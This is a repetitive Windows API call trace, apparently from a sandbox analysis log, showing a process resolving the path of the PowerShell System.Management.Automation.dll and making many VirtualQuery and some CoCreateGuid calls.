	[0412.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.328] VirtualQuery (in: lpAddress=0x20b4e0, lpBuffer=0x20c3a0, dwLength=0x30 | out: lpBuffer=0x20c3a0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.329] VirtualQuery (in: lpAddress=0x20b570, lpBuffer=0x20c430, dwLength=0x30 | out: lpBuffer=0x20c430*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.331] VirtualQuery (in: lpAddress=0x20bcf0, lpBuffer=0x20cbb0, dwLength=0x30 | out: lpBuffer=0x20cbb0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.332] VirtualQuery (in: lpAddress=0x20bcf0, lpBuffer=0x20cbb0, dwLength=0x30 | out: lpBuffer=0x20cbb0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.334] VirtualQuery (in: lpAddress=0x20bcf0, lpBuffer=0x20cbb0, dwLength=0x30 | out: lpBuffer=0x20cbb0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.334] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.334] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.335] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.335] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.335] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.335] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.335] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.335] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.335] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.335] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.336] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.336] VirtualQuery (in: lpAddress=0x20b920, lpBuffer=0x20c7e0, dwLength=0x30 | out: lpBuffer=0x20c7e0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.336] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.336] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.336] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.336] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.336] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xd0a3e7ca, Data2=0x9348, Data3=0x4490, Data4=([0]=0x9e, [1]=0x4e, [2]=0xa9, [3]=0x33, [4]=0x30, [5]=0xe6, [6]=0xfd, [7]=0x49))) returned 0x0
	[0412.337] VirtualQuery (in: lpAddress=0x20bcf0, lpBuffer=0x20cbb0, dwLength=0x30 | out: lpBuffer=0x20cbb0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.337] VirtualQuery (in: lpAddress=0x20bcf0, lpBuffer=0x20cbb0, dwLength=0x30 | out: lpBuffer=0x20cbb0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.337] VirtualQuery (in: lpAddress=0x20bcf0, lpBuffer=0x20cbb0, dwLength=0x30 | out: lpBuffer=0x20cbb0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.337] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.337] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.338] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.338] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.338] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.338] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.338] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.338] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.338] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.339] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.339] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.339] VirtualQuery (in: lpAddress=0x20b920, lpBuffer=0x20c7e0, dwLength=0x30 | out: lpBuffer=0x20c7e0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.339] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.339] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.339] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.339] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.340] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xe628f468, Data2=0x5682, Data3=0x4cae, Data4=([0]=0x92, [1]=0x68, [2]=0xb0, [3]=0x36, [4]=0xc1, [5]=0xac, [6]=0x7a, [7]=0xc8))) returned 0x0
	[0412.340] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x899d5870, Data2=0x7df7, Data3=0x4745, Data4=([0]=0xa8, [1]=0x98, [2]=0x30, [3]=0x90, [4]=0x33, [5]=0xa1, [6]=0xa5, [7]=0x2))) returned 0x0
	[0412.340] VirtualQuery (in: lpAddress=0x20b350, lpBuffer=0x20c210, dwLength=0x30 | out: lpBuffer=0x20c210*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.340] VirtualQuery (in: lpAddress=0x20b350, lpBuffer=0x20c210, dwLength=0x30 | out: lpBuffer=0x20c210*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.340] VirtualQuery (in: lpAddress=0x20b3e0, lpBuffer=0x20c2a0, dwLength=0x30 | out: lpBuffer=0x20c2a0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.341] VirtualQuery (in: lpAddress=0x20b350, lpBuffer=0x20c210, dwLength=0x30 | out: lpBuffer=0x20c210*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.341] VirtualQuery (in: lpAddress=0x20b3e0, lpBuffer=0x20c2a0, dwLength=0x30 | out: lpBuffer=0x20c2a0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.341] VirtualQuery (in: lpAddress=0x20b350, lpBuffer=0x20c210, dwLength=0x30 | out: lpBuffer=0x20c210*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.341] VirtualQuery (in: lpAddress=0x20b3e0, lpBuffer=0x20c2a0, dwLength=0x30 | out: lpBuffer=0x20c2a0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.341] VirtualQuery (in: lpAddress=0x20b350, lpBuffer=0x20c210, dwLength=0x30 | out: lpBuffer=0x20c210*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
